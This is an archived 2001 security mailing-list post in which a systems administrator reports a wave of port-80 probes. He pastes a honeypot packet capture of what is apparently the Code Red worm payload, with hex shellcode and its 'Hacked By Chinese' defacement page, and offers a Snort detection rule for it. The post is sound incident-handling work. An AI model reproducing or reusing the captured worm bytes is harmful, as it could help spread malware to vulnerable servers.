Hi guys, From Thursday last week, I have had thousands (21296) of attempted connects from thousands (7650) of hosts to port 80 on a host on my network that does not have a web server running. I decided to open this up on my firewall and setup a small honeypot to see what the traffic was about. Lo and behold: 18:59:07.487672 210.239.180.224.32769 > 194.130.109.164.80: P [tcp sum ok] 2925:4040(1115) ack 1 win 17520 (DF) (ttl 104, id 46743, len 1155) 0x0000 4500 0483 b697 4000 6806 9fe6 d2ef b4e0 E.....@.h....... 0x0010 c282 6da4 8001 0050 c56d 3b34 c6fa 9e83 ..m....P.m;4.... 0x0020 5018 4470 5da3 0000 ff8b 8d64 feff ff0f P.Dp]......d.... 0x0030 be11 85d2 7402 ebd3 8bf4 6a00 8b85 4cfe ....t.....j...L. 0x0040 ffff 508b 4d08 8b51 6452 8b85 78fe ffff ..P.M..QdR..x... 0x0050 50ff 95c0 feff ff3b f490 434b 434b c785 P......;..CKCK.. 0x0060 4cfe ffff 0000 0000 8b8d 68fe ffff 83c1 L.........h..... 0x0070 0789 8d64 feff ffeb 1e8b 9564 feff ff83 ...d.......d.... 0x0080 c201 8995 64fe ffff 8b85 4cfe ffff 83c0 ....d.....L..... 0x0090 0189 854c feff ff8b 8d64 feff ff0f be11 ...L.....d...... 0x00a0 85d2 7402 ebd3 8bf4 6a00 8b85 4cfe ffff ..t.....j...L... 0x00b0 508b 8d68 feff ff83 c107 518b 9578 feff P..h......Q..x.. 0x00c0 ff52 ff95 c0fe ffff 3bf4 9043 4b43 4b8b .R......;..CKCK. 0x00d0 4508 8b48 7089 8d4c feff ff8b f46a 008b E..Hp..L.....j.. 0x00e0 954c feff ff52 8b45 088b 4878 518b 9578 .L...R.E..HxQ..x 0x00f0 feff ff52 ff95 c0fe ffff 3bf4 9043 4b43 ...R......;..CKC 0x0100 4bc6 85fc feff ff00 8bf4 6a00 6800 0100 K.........j.h... 0x0110 008d 85fc feff ff50 8b8d 78fe ffff 51ff .......P..x...Q. 0x0120 95c4 feff ff3b f490 434b 434b 8985 4cfe .....;..CKCK..L. 0x0130 ffff 8bf4 8b95 78fe ffff 52ff 95c8 feff ......x...R..... 0x0140 ff3b f490 434b 434b e90c fbff ffeb fee8 .;..CKCK........ 0x0150 8cf5 ffff eb30 5883 c005 5557 5356 506a .....0X...UWSVPj 0x0160 3c8b f083 c60c 5668 0001 0000 ff70 08ff <.....Vh.....p.. 0x0170 7424 28ff 1058 50ff 7424 18ff 5004 585e t$(..XP.t$..P.X^ 0x0180 5b5f 5dff 2090 e8cb ffff ffe8 7bf9 ffff [_].........{... 0x0190 b878 5634 12b8 7856 3412 b878 5634 12b8 .xV4..xV4..xV4.. 0x01a0 7856 3412 b878 5634 1258 508b bd68 feff xV4..xV4.XP..h.. 0x01b0 ff89 47f2 c38b 4424 0c05 b800 0000 c700 ..G...D$........ 0x01c0 2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f *.L.3.........Lo 0x01d0 6164 4c69 6272 6172 7941 0047 6574 5379 adLibraryA.GetSy 0x01e0 7374 656d 5469 6d65 0043 7265 6174 6554 stemTime.CreateT 0x01f0 6872 6561 6400 4372 6561 7465 4669 6c65 hread.CreateFile 0x0200 4100 536c 6565 7000 4765 7453 7973 7465 A.Sleep.GetSyste 0x0210 6d44 6566 6175 6c74 4c61 6e67 4944 0056 mDefaultLangID.V 0x0220 6972 7475 616c 5072 6f74 6563 7400 0969 irtualProtect..i 0x0230 6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053 nfocomm.dll.TcpS 0x0240 6f63 6b53 656e 6400 0957 5332 5f33 322e ockSend..WS2_32. 0x0250 646c 6c00 736f 636b 6574 0063 6f6e 6e65 dll.socket.conne 0x0260 6374 0073 656e 6400 7265 6376 0063 6c6f ct.send.recv.clo 0x0270 7365 736f 636b 6574 0009 7733 7376 632e sesocket..w3svc. 0x0280 646c 6c00 0047 4554 2000 3f00 2020 4854 dll..GET..?...HT 0x0290 5450 2f31 2e30 0d0a 436f 6e74 656e 742d TP/1.0..Content- 0x02a0 7479 7065 3a20 7465 7874 2f78 6d6c 0a48 type:.text/xml.H 0x02b0 4f53 543a 7777 772e 776f 726d 2e63 6f6d OST:www.worm.com 0x02c0 0a20 4163 6365 7074 3a20 2a2f 2a0a 436f ..Accept:.*/*.Co 0x02d0 6e74 656e 742d 6c65 6e67 7468 3a20 3335 ntent-length:.35 0x02e0 3639 200d 0a0d 0a00 633a 5c6e 6f74 776f 69......c:\notwo 0x02f0 726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c rm.LMTH..<html>< 0x0300 6865 6164 3e3c 6d65 7461 2068 7474 702d head><meta.http- 0x0310 6571 7569 763d 2243 6f6e 7465 6e74 2d54 equiv="Content-T 0x0320 7970 6522 2063 6f6e 7465 6e74 3d22 7465 ype".content="te 0x0330 7874 2f68 746d 6c3b 2063 6861 7273 6574 xt/html;.charset 0x0340 3d65 6e67 6c69 7368 223e 3c74 6974 6c65 =english"><title 0x0350 3e48 454c 4c4f 213c 2f74 6974 6c65 3e3c >HELLO!</title>< 0x0360 2f68 6561 643e 3c62 6164 793e 3c68 7220 /head><bady><hr. 0x0370 7369 7a65 3d35 3e3c 666f 6e74 2063 6f6c size=5><font.col 0x0380 6f72 3d22 7265 6422 3e3c 7020 616c 6967 or="red"><p.alig 0x0390 6e3d 2263 656e 7465 7222 3e57 656c 636f n="center">Welco 0x03a0 6d65 2074 6f20 6874 7470 3a2f 2f77 7777 me.to.http://www 0x03b0 2e77 6f72 6d2e 636f 6d20 213c 6272 3e3c .worm.com.!<br>< 0x03c0 6272 3e48 6163 6b65 6420 4279 2043 6869 br>Hacked.By.Chi 0x03d0 6e65 7365 213c 2f66 6f6e 743e 3c2f 6872 nese!</font></hr 0x03e0 3e3c 2f62 6164 793e 3c2f 6874 6d6c 3e20 ></bady></html>. 0x03f0 2020 2020 2020 2020 2020 2020 2020 2020 ................ 0x0400 2020 2020 2020 2020 2020 2020 2020 2020 ................ 0x0410 2020 2020 2020 2020 2020 2020 2020 2020 ................ 0x0420 2020 2020 2020 2020 2020 2020 2020 2020 ................ 0x0430 2020 2020 2020 2020 2020 2020 2020 2020 ................ 0x0440 2020 2020 2020 2020 2020 2020 2020 2020 ................ 0x0450 2020 2020 2020 2020 2020 2020 2020 2020 ................ 0x0460 2020 2020 2020 2020 2020 2020 2020 2020 ................ 0x0470 2020 2020 2020 2020 2020 2020 2020 2020 ................ 0x0480 2020 20 ... Any ideas? If this is a worm, it's already got 7650 hosts. I'm logging this all the logs on my IDS hosts with the following signature: alert TCP $EXTERNAL any -> $INTERNAL any (msg: "Hacked by Chinese"; dsize: >1000; flags: P+; content: "|2e776f72 6d2e636f 6d20213c 62723e3c|";) Having just written the rule and popped it in the IDS, I've seen 34 connections from 11 different hosts. Looks bad. Rgds, -- Scott Nursten - Systems Administrator ---------------------------------------------- ddi: +44 (0) 1293 744 122 work: +44 (0) 1293 402 040 fax: +44 (0) 1293 402 050 email: scottnat_private wwweb: http://www.streetsonline.co.uk ---------------------------------------------- "Without order nothing can exist - without chaos nothing can evolve." ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 12:44:18 PDT